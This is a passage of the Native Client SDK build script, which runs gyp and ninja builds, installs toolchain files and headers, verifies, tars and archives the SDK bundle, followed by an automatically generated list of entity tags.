# to a mapping from source to destination names.
if type(file_spec) == str:
src_file = dest_file = file_spec
else:
src_file, dest_file = file_spec
src_file = os.path.join(src_root, src_file)
# Expand sources files using glob.
sources = glob.glob(src_file)
if not sources:
sources = [src_file]
if len(sources) > 1 and not dest_file.endswith('/'):
buildbot_common.ErrorExit("Target file must end in '/' when "
"using globbing to install multiple files")
for source in sources:
if dest_file.endswith('/'):
dest = os.path.join(dest_file, os.path.basename(source))
else:
dest = dest_file
dest = os.path.join(dest_root, dest)
if not os.path.isdir(os.path.dirname(dest)):
buildbot_common.MakeDir(os.path.dirname(dest))
buildbot_common.CopyFile(source, dest)
def InstallNaClHeaders(tc_dst_inc, tcname):
"""Copies NaCl headers to expected locations in the toolchain."""
InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)])
def MakeNinjaRelPath(path):
return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)
# TODO(ncbray): stop building and copying libraries into the SDK that are
# already provided by the toolchain.
# Mapping from libc to libraries gyp-build trusted libraries
TOOLCHAIN_LIBS = {
'newlib' : [
'libminidump_generator.a',
'libnacl.a',
'libnacl_dyncode.a',
'libnacl_exception.a',
'libnacl_list_mappings.a',
'libnosys.a',
'libppapi.a',
'libppapi_stub.a',
'libpthread.a',
],
'glibc': [
'libminidump_generator.a',
'libminidump_generator.so',
'libnacl.a',
'libnacl_dyncode.a',
'libnacl_dyncode.so',
'libnacl_exception.a',
'libnacl_exception.so',
'libnacl_list_mappings.a',
'libnacl_list_mappings.so',
'libppapi.a',
'libppapi.so',
'libppapi_stub.a',
]
}
def GypNinjaInstall(pepperdir, toolchains):
tools_files_32 = [
['sel_ldr', 'sel_ldr_x86_32'],
['irt_core_newlib_x32.nexe', 'irt_core_x86_32.nexe'],
['irt_core_newlib_x64.nexe', 'irt_core_x86_64.nexe'],
]
arm_files = [
['elf_loader_newlib_arm.nexe', 'elf_loader_arm.nexe'],
]
tools_files_64 = []
platform = getos.GetPlatform()
# TODO(binji): dump_syms doesn't currently build on Windows. See
# http://crbug.com/245456
if platform != 'win':
tools_files_64 += [
['dump_syms', 'dump_syms'],
['minidump_dump', 'minidump_dump'],
['minidump_stackwalk', 'minidump_stackwalk']
]
tools_files_64.append(['sel_ldr', 'sel_ldr_x86_64'])
tools_files_64.append(['ncval_new', 'ncval'])
if platform == 'linux':
tools_files_32.append(['nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_32'])
tools_files_64.append(['nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_64'])
tools_files_32.append(['nonsfi_loader_newlib_x32_nonsfi.nexe',
'nonsfi_loader_x86_32'])
tools_dir = os.path.join(pepperdir, 'tools')
buildbot_common.MakeDir(tools_dir)
# Add .exe extensions to all windows tools
for pair in tools_files_32 + tools_files_64:
if platform == 'win' and not pair[0].endswith('.nexe'):
pair[0] += '.exe'
pair[1] += '.exe'
# Add ARM binaries
if platform == 'linux' and not options.no_arm_trusted:
arm_files += [
['irt_core_newlib_arm.nexe', 'irt_core_arm.nexe'],
['nacl_helper_bootstrap', 'nacl_helper_bootstrap_arm'],
['nonsfi_loader_newlib_arm_nonsfi.nexe', 'nonsfi_loader_arm'],
['sel_ldr', 'sel_ldr_arm']
]
InstallFiles(GetNinjaOutDir('x64'), tools_dir, tools_files_64)
InstallFiles(GetNinjaOutDir('ia32'), tools_dir, tools_files_32)
InstallFiles(GetNinjaOutDir('arm'), tools_dir, arm_files)
for tc in toolchains:
if tc in ('host', 'clang-newlib'):
continue
elif tc == 'pnacl':
xarches = (None, 'ia32', 'x64', 'arm')
elif tc in ('x86_glibc', 'x86_newlib'):
xarches = ('ia32', 'x64')
elif tc == 'arm_glibc':
xarches = ('arm',)
else:
raise AssertionError('unexpected toolchain value: %s' % tc)
for xarch in xarches:
src_dir = GetGypBuiltLib(tc, xarch)
dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch)
libc = GetToolchainLibc(tc)
InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc])
def GypNinjaBuild_NaCl(rel_out_dir):
gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl')
nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp')
all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp')
out_dir_32 = MakeNinjaRelPath(rel_out_dir + '-ia32')
out_dir_64 = MakeNinjaRelPath(rel_out_dir + '-x64')
out_dir_arm = MakeNinjaRelPath(rel_out_dir + '-arm')
out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + '-clang-ia32')
out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + '-clang-x64')
out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + '-clang-arm')
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_32,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_64,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_arm,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_32, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_64, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_arm, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_new', out_dir_64)
def GypNinjaBuild_Breakpad(rel_out_dir):
# TODO(binji): dump_syms doesn't currently build on Windows. See
# http://crbug.com/245456
if getos.GetPlatform() == 'win':
return
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'breakpad', 'breakpad.gyp')
build_list = ['dump_syms', 'minidump_dump', 'minidump_stackwalk']
GypNinjaBuild('x64', gyp_py, gyp_file, build_list, out_dir)
def GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None):
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client',
'native_client.gyp')
GypNinjaBuild(arch, gyp_py, gyp_file, 'ppapi_lib', out_dir,
gyp_defines=gyp_defines)
def GypNinjaBuild_Pnacl(rel_out_dir, target_arch):
# TODO(binji): This will build the pnacl_irt_shim twice; once as part of the
# Chromium build, and once here. When we move more of the SDK build process
# to gyp, we can remove this.
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src',
'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp')
targets = ['aot']
GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)
def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets,
out_dir, gyp_defines=None):
gyp_env = dict(os.environ)
gyp_env['GYP_GENERATORS'] = 'ninja'
gyp_defines = gyp_defines or []
gyp_defines.append('nacl_allow_thin_archives=0')
if not options.no_use_sysroot:
gyp_defines.append('use_sysroot=1')
if options.mac_sdk:
gyp_defines.append('mac_sdk=%s' % options.mac_sdk)
if arch is not None:
gyp_defines.append('target_arch=%s' % arch)
if arch == 'arm':
gyp_env['GYP_CROSSCOMPILE'] = '1'
if options.no_arm_trusted:
gyp_defines.append('disable_cross_trusted=1')
if getos.GetPlatform() == 'mac':
gyp_defines.append('clang=1')
gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines)
# We can't use windows path separators in GYP_GENERATOR_FLAGS since
# gyp uses shlex to parse them and treats '\' as an escape char.
gyp_env['GYP_GENERATOR_FLAGS'] = 'output_dir=%s' % out_dir.replace('\\', '/')
# Print relevant environment variables
for key, value in gyp_env.iteritems():
if key.startswith('GYP') or key in ('CC',):
print ' %s="%s"' % (key, value)
buildbot_common.Run(
[sys.executable, gyp_py_script, gyp_file, '--depth=.'],
cwd=SRC_DIR,
env=gyp_env)
NinjaBuild(targets, out_dir, arch)
def NinjaBuild(targets, out_dir, arch):
if type(targets) is not list:
targets = [targets]
out_config_dir = os.path.join(out_dir, GetConfigDir(arch))
buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR)
def BuildStepBuildToolchains(pepperdir, toolchains, build, clean):
buildbot_common.BuildStep('SDK Items')
if clean:
for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + '*')):
buildbot_common.RemoveDir(dirname)
build = True
if build:
GypNinjaBuild_NaCl(GYPBUILD_DIR)
GypNinjaBuild_Breakpad(GYPBUILD_DIR + '-x64')
if set(toolchains) & set(['x86_glibc', 'x86_newlib']):
GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-ia32',
['use_nacl_clang=0'])
GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-x64',
['use_nacl_clang=0'])
if 'arm_glibc' in toolchains:
GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-arm',
['use_nacl_clang=0'] )
if 'pnacl' in toolchains:
GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-clang-ia32',
['use_nacl_clang=1'])
GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-clang-x64',
['use_nacl_clang=1'])
GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-clang-arm',
['use_nacl_clang=1'])
# NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
build_dir = GYPBUILD_DIR + '-pnacl-' + arch
GypNinjaBuild_Pnacl(build_dir, arch)
GypNinjaInstall(pepperdir, toolchains)
for toolchain in toolchains:
if toolchain not in ('host', 'clang-newlib'):
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain),
toolchain)
if 'pnacl' in toolchains:
# NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
build_dir = GYPBUILD_DIR + '-pnacl-' + arch
if arch == 'ia32':
nacl_arches = ['x86-32', 'x86-64']
elif arch == 'arm':
nacl_arches = ['arm']
else:
buildbot_common.ErrorExit('Unknown architecture: %s' % arch)
for nacl_arch in nacl_arches:
release_build_dir = os.path.join(OUT_DIR, build_dir, 'Release',
'gen', 'tc_pnacl_translate',
'lib-' + nacl_arch)
pnacldir = GetToolchainDir(pepperdir, 'pnacl')
pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch)
if not os.path.isdir(pnacl_translator_lib_dir):
buildbot_common.ErrorExit('Expected %s directory to exist.' %
pnacl_translator_lib_dir)
buildbot_common.CopyFile(
os.path.join(release_build_dir, 'libpnacl_irt_shim.a'),
pnacl_translator_lib_dir)
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'x86'),
'pnacl')
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'arm'),
'pnacl')
def MakeDirectoryOrClobber(pepperdir, dirname, clobber):
dirpath = os.path.join(pepperdir, dirname)
if clobber:
buildbot_common.RemoveDir(dirpath)
buildbot_common.MakeDir(dirpath)
return dirpath
def BuildStepUpdateHelpers(pepperdir, clobber):
buildbot_common.BuildStep('Update project helpers')
build_projects.UpdateHelpers(pepperdir, clobber=clobber)
def BuildStepUpdateUserProjects(pepperdir, toolchains,
build_experimental, clobber):
buildbot_common.BuildStep('Update examples and libraries')
filters = {}
if not build_experimental:
filters['EXPERIMENTAL'] = False
dsc_toolchains = []
for t in toolchains:
if t.startswith('x86_') or t.startswith('arm_'):
if t[4:] not in dsc_toolchains:
dsc_toolchains.append(t[4:])
elif t == 'host':
dsc_toolchains.append(getos.GetPlatform())
else:
dsc_toolchains.append(t)
filters['TOOLS'] = dsc_toolchains
# Update examples and libraries
filters['DEST'] = [
'getting_started',
'examples/api',
'examples/demo',
'examples/tutorial',
'src'
]
tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters)
build_projects.UpdateProjects(pepperdir, tree, clobber=clobber,
toolchains=dsc_toolchains)
def BuildStepMakeAll(pepperdir, directory, step_name,
deps=True, clean=False, config='Debug', args=None):
buildbot_common.BuildStep(step_name)
build_projects.BuildProjectsBranch(pepperdir, directory, clean,
deps, config, args)
def BuildStepBuildLibraries(pepperdir, directory):
BuildStepMakeAll(pepperdir, directory, 'Build Libraries Debug',
clean=True, config='Debug')
BuildStepMakeAll(pepperdir, directory, 'Build Libraries Release',
clean=True, config='Release')
# Cleanup .pyc file generated while building libraries. Without
# this we would end up shipping the pyc in the SDK tarball.
buildbot_common.RemoveFile(os.path.join(pepperdir, 'tools', '*.pyc'))
def GenerateNotice(fileroot, output_filename='NOTICE', extra_files=None):
# Look for LICENSE files
license_filenames_re = re.compile('LICENSE|COPYING|COPYRIGHT')
license_files = []
for root, _, files in os.walk(fileroot):
for filename in files:
if license_filenames_re.match(filename):
path = os.path.join(root, filename)
license_files.append(path)
if extra_files:
license_files += [os.path.join(fileroot, f) for f in extra_files]
print '\n'.join(license_files)
if not os.path.isabs(output_filename):
output_filename = os.path.join(fileroot, output_filename)
generate_notice.Generate(output_filename, fileroot, license_files)
def BuildStepVerifyFilelist(pepperdir):
buildbot_common.BuildStep('Verify SDK Files')
file_list_path = os.path.join(SCRIPT_DIR, 'sdk_files.list')
try:
print 'SDK directory: %s' % pepperdir
verify_filelist.Verify(file_list_path, pepperdir)
print 'OK'
except verify_filelist.ParseException, e:
buildbot_common.ErrorExit('Parsing sdk_files.list failed:\n\n%s' % e)
except verify_filelist.VerifyException, e:
file_list_rel = os.path.relpath(file_list_path)
verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + '.py'
verify_filelist_py = os.path.relpath(verify_filelist_py)
pepperdir_rel = os.path.relpath(pepperdir)
msg = """\
SDK verification failed:
%s
Add/remove files from %s to fix.
Run:
./%s %s %s
to test.""" % (e, file_list_rel, verify_filelist_py, file_list_rel,
pepperdir_rel)
buildbot_common.ErrorExit(msg)
def BuildStepTarBundle(pepper_ver, tarfile):
buildbot_common.BuildStep('Tar Pepper Bundle')
buildbot_common.MakeDir(os.path.dirname(tarfile))
buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile,
'pepper_' + pepper_ver], cwd=NACL_DIR)
def GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile,
archive_url):
with open(tarfile, 'rb') as tarfile_stream:
archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(
tarfile_stream)
archive = manifest_util.Archive(manifest_util.GetHostOS())
archive.url = archive_url
archive.size = archive_size
archive.checksum = archive_sha1
bundle = manifest_util.Bundle('pepper_' + pepper_ver)
bundle.revision = int(chrome_revision)
bundle.repath = 'pepper_' + pepper_ver
bundle.version = int(pepper_ver)
bundle.description = (
'Chrome %s bundle. Chrome revision: %s. NaCl revision: %s' % (
pepper_ver, chrome_revision, nacl_revision))
bundle.stability = 'dev'
bundle.recommended = 'no'
bundle.archives = [archive]
return bundle
def Archive(filename, from_directory, step_link=True):
if buildbot_common.IsSDKBuilder():
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/'
else:
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk_test/'
bucket_path += build_version.ChromeVersion()
buildbot_common.Archive(filename, bucket_path, from_directory, step_link)
def BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision,
tarfile):
buildbot_common.BuildStep('Archive %s' % name)
tarname = os.path.basename(tarfile)
tarfile_dir = os.path.dirname(tarfile)
Archive(tarname, tarfile_dir)
# generate "manifest snippet" for this archive.
archive_url = GSTORE + 'nacl_sdk/%s/%s' % (
build_version.ChromeVersion(), tarname)
bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision,
tarfile, archive_url)
manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json')
with open(manifest_snippet_file, 'wb') as manifest_snippet_stream:
manifest_snippet_stream.write(bundle.GetDataAsString())
Archive(tarname + '.json', OUT_DIR, step_link=False)
def BuildStepBuildPNaClComponent(version, revision):
# Sadly revision can go backwords for a given version since when a version
# is built from master, revision will be a huge number (in the hundreds of
# thousands. Once the branch happens the revision will reset to zero.
# TODO(sbc): figure out how to compensate for this in some way such that
# revisions always go forward for a given version.
buildbot_common.BuildStep('PNaCl Component')
# Version numbers must follow the format specified in:
# https://developer.chrome.com/extensions/manifest/version
# So ensure that rev_major/rev_minor don't overflow and ensure there
# are no leading zeros.
if len(revision) > 4:
rev_minor = int(revision[-4:])
rev_major = int(revision[:-4])
version = "0.%s.%s.%s" % (version, rev_major, rev_minor)
else:
version = "0.%s.0.%s" % (version, revision)
buildbot_common.Run(['./make_pnacl_component.sh',
'pnacl_multicrx_%s.zip' % revision,
version], cwd=SCRIPT_DIR)
def BuildStepArchivePNaClComponent(revision):
buildbot_common.BuildStep('Archive PNaCl Component')
Archive('pnacl_multicrx_%s.zip' % revision, OUT_DIR)
def BuildStepArchiveSDKTools():
buildbot_common.BuildStep('Build SDK Tools')
build_updater.BuildUpdater(OUT_DIR)
buildbot_common.BuildStep('Archive SDK Tools')
Archive('sdk_tools.tgz', OUT_DIR, step_link=False)
Archive('nacl_sdk.zip', OUT_DIR, step_link=False)
def BuildStepBuildAppEngine(pepperdir, chrome_revision):
"""Build the projects found in src/gonacl_appengine/src"""
buildbot_common.BuildStep('Build GoNaCl AppEngine Projects')
cmd = ['make', 'upload', 'REVISION=%s' % chrome_revision]
env = dict(os.environ)
env['NACL_SDK_ROOT'] = pepperdir
env['NACLPORTS_NO_ANNOTATE'] = "1"
buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR)
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--qemu', help='Add qemu for ARM.',
action='store_true')
parser.add_argument('--tar', help='Force the tar step.',
action='store_true')
parser.add_argument('--archive', help='Force the archive step.',
action='store_true')
parser.add_argument('--release', help='PPAPI release version.',
dest='release', default=None)
parser.add_argument('--build-app-engine',
help='Build AppEngine demos.', action='store_true')
parser.add_argument('--experimental',
help='build experimental examples and libraries', action='store_true',
dest='build_experimental')
parser.add_argument('--skip-toolchain', help='Skip toolchain untar',
action='store_true')
parser.add_argument('--no-clean', dest='clean', action='store_false',
help="Don't clean gypbuild directories")
parser.add_argument('--mac-sdk',
help='Set the mac-sdk (e.g. 10.6) to use when building with ninja.')
parser.add_argument('--no-arm-trusted', action='store_true',
help='Disable building of ARM trusted components (sel_ldr, etc).')
parser.add_argument('--no-use-sysroot', action='store_true',
help='Disable building against sysroot.')
# To setup bash completion for this command first install optcomplete
# and then add this line to your .bashrc:
# complete -F _optcomplete build_sdk.py
try:
import optcomplete
optcomplete.autocomplete(parser)
except ImportError:
pass
global options
options = parser.parse_args(args)
buildbot_common.BuildStep('build_sdk')
if buildbot_common.IsSDKBuilder():
options.archive = True
# TODO(binji): re-enable app_engine build when the linux builder stops
# breaking when trying to git clone from github.
# See http://crbug.com/412969.
options.build_app_engine = False
options.tar = True
# NOTE: order matters here. This will be the order that is specified in the
# Makefiles; the first toolchain will be the default.
toolchains = ['pnacl', 'x86_glibc', 'arm_glibc', 'clang-newlib', 'host']
print 'Building: ' + ' '.join(toolchains)
platform = getos.GetPlatform()
if options.archive and not options.tar:
parser.error('Incompatible arguments with archive.')
chrome_version = int(build_version.ChromeMajorVersion())
chrome_revision = build_version.ChromeRevision()
nacl_revision = build_version.NaClRevision()
pepper_ver = str(chrome_version)
pepper_old = str(chrome_version - 1)
pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver)
pepperdir_old = os.path.join(OUT_DIR, 'pepper_' + pepper_old)
tarname = 'naclsdk_%s.tar.bz2' % platform
tarfile = os.path.join(OUT_DIR, tarname)
if options.release:
pepper_ver = options.release
print 'Building PEPPER %s at %s' % (pepper_ver, chrome_revision)
if 'NACL_SDK_ROOT' in os.environ:
# We don't want the currently configured NACL_SDK_ROOT to have any effect
# of the build.
del os.environ['NACL_SDK_ROOT']
if platform == 'linux':
# Linux-only: make sure the debian/stable sysroot image is installed
install_script = os.path.join(SRC_DIR, 'build', 'linux', 'sysroot_scripts',
'install-sysroot.py')
buildbot_common.Run([sys.executable, install_script, '--arch=arm'])
buildbot_common.Run([sys.executable, install_script, '--arch=i386'])
buildbot_common.Run([sys.executable, install_script, '--arch=amd64'])
if not options.skip_toolchain:
BuildStepCleanPepperDirs(pepperdir, pepperdir_old)
BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools'])
BuildStepDownloadToolchains(toolchains)
BuildStepUntarToolchains(pepperdir, toolchains)
if platform == 'linux':
buildbot_common.Move(os.path.join(pepperdir, 'toolchain', 'arm_trusted'),
os.path.join(OUT_DIR, 'arm_trusted'))
if platform == 'linux':
# Linux-only: Copy arm libraries from the arm_trusted package. These are
# needed to be able to run sel_ldr_arm under qemu.
arm_libs = [
'lib/arm-linux-gnueabihf/librt.so.1',
'lib/arm-linux-gnueabihf/libpthread.so.0',
'lib/arm-linux-gnueabihf/libgcc_s.so.1',
'lib/arm-linux-gnueabihf/libc.so.6',
'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3',
'lib/arm-linux-gnueabihf/libm.so.6',
'usr/lib/arm-linux-gnueabihf/libstdc++.so.6'
]
arm_lib_dir = os.path.join(pepperdir, 'tools', 'lib', 'arm_trusted', 'lib')
buildbot_common.MakeDir(arm_lib_dir)
for arm_lib in arm_libs:
arm_lib = os.path.join(OUT_DIR, 'arm_trusted', arm_lib)
buildbot_common.CopyFile(arm_lib, arm_lib_dir)
buildbot_common.CopyFile(os.path.join(OUT_DIR, 'arm_trusted', 'qemu-arm'),
os.path.join(pepperdir, 'tools'))
BuildStepBuildToolchains(pepperdir, toolchains,
not options.skip_toolchain,
options.clean)
BuildStepUpdateHelpers(pepperdir, True)
BuildStepUpdateUserProjects(pepperdir, toolchains,
options.build_experimental, True)
BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision)
# Ship with libraries prebuilt, so run that first.
BuildStepBuildLibraries(pepperdir, 'src')
GenerateNotice(pepperdir)
# Verify the SDK contains what we expect.
BuildStepVerifyFilelist(pepperdir)
if options.tar:
BuildStepTarBundle(pepper_ver, tarfile)
if platform == 'linux':
BuildStepBuildPNaClComponent(pepper_ver, chrome_revision)
if options.build_app_engine and platform == 'linux':
BuildStepBuildAppEngine(pepperdir, chrome_revision)
if options.qemu:
qemudir = os.path.join(NACL_DIR, 'toolchain', 'linux_arm-trusted')
oshelpers.Copy(['-r', qemudir, pepperdir])
# Archive the results on Google Cloud Storage.
if options.archive:
BuildStepArchiveBundle('build', pepper_ver, chrome_revision, nacl_revision,
tarfile)
# Only archive sdk_tools/naclport/pnacl_component on linux.
if platform == 'linux':
BuildStepArchiveSDKTools()
BuildStepArchivePNaClComponent(chrome_revision)
return 0
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
buildbot_common.ErrorExit('build_sdk: interrupted')
| 36,336 | [['URL', "https://chromium.googlesource.com/external/naclports.git'"], ['DATE_TIME', '2012'], ['NRP', 'NACL_DIR'], ['PERSON', 'sys.path.append(os.path.join(NACL_DIR'], ['PERSON', 'https://chromium.googlesource.com/external/naclports.git'], ['PERSON', 'gypbuild'], ['DATE_TIME', "'32"], ['DATE_TIME', "'64'"], ['LOCATION', 'tcname'], ['PERSON', 'arch'], ['LOCATION', 'BuildStepCleanPepperDirs(pepperdir'], ['LOCATION', 'pepperdir'], ['PERSON', 'TEXT_FILES'], ['DATE_TIME', 'Year/Month/Day Hour:Minute:Second'], ['LOCATION', 'tmpdir'], ['PERSON', 'full_src_dir'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'NACL_HEADER_MAP[GetToolchainLibc(tcname'], ['PERSON', 'libppapi.a'], ['PERSON', 'libppapi.a'], ['PERSON', 'tools_dir = os.path.join(pepperdir'], ['PERSON', 'nonsfi_loader_arm'], ['PERSON', 'sel_ldr_arm'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['PERSON', 'elif tc'], ['LOCATION', 'tc'], ['PERSON', 'xarch'], ['PERSON', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'out_dir_arm'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['PERSON', 'out_dir_64'], ['DATE_TIME', 'GypNinjaBuild_PPAPI(arch'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'arch'], ['PERSON', 'glob.glob(os.path.join(OUT_DIR'], ['PERSON', "GypNinjaBuild_PPAPI('arm"], ['PERSON', "GypNinjaBuild_PPAPI('arm"], ['LOCATION', 'GypNinjaBuild_Pnacl(build_dir'], ['PERSON', 'release_build_dir = os.path.join(OUT_DIR'], ['PERSON', 'pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['LOCATION', 'MakeDirectoryOrClobber(pepperdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', "filters['EXPERIMENTAL"], ['LOCATION', 'BuildStepMakeAll(pepperdir'], ['LOCATION', 'fileroot'], ['PERSON', 'license_files'], ['LOCATION', 'pepperdir'], ['URL', 'archive.si'], ['PERSON', "Bundle('pepper"], ['LOCATION', 'int(pepper_ver'], ['PERSON', 'step_link=True'], ['URL', 'common.Is'], ['LOCATION', 'nacl'], ['PERSON', 'step_link'], ['PERSON', 'tarfile_dir'], ['URL', 'os.path.jo'], ['PERSON', "help='Add qemu"], ['PERSON', 'gypbuild'], ['PERSON', 'optcomplete'], ['PERSON', 'pepperdir = os.path.join(OUT_DIR'], ['PERSON', 'naclsdk_%s.tar.bz2'], ['PERSON', 'BuildStepMakePepperDirs(pepperdir'], ['PERSON', 'sel_ldr_arm'], ['PERSON', 'arm_libs'], ['PERSON', 'qemudir'], ['PERSON', 'qemudir'], ['LOCATION', 'naclport'], ['URL', 'http://crbug.com/245456'], ['URL', 'http://crbug.com/245456'], ['URL', 'https://developer.chrome.com/extensions/manifest/version'], ['URL', 'http://crbug.com/412969.'], ['URL', 'sys.ve'], ['URL', 'sys.st'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'cygtar.py'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'README.Ma'], ['URL', 'os.path.jo'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'version.Ch'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'datetime.datetime.no'], ['URL', 'os.path.jo'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'MAP.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Mo'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.re'], ['URL', 'generator.so'], ['URL', 'dyncode.so'], ['URL', 'exception.so'], ['URL', 'mappings.so'], ['URL', 'libppapi.so'], ['URL', 'x32.ne'], ['URL', '32.ne'], ['URL', 'x64.ne'], ['URL', '64.ne'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'getos.Ge'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'options.no'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'sdk.gy'], ['URL', 'os.path.jo'], ['URL', 'all.gy'], ['URL', 'getos.Ge'], ['URL', 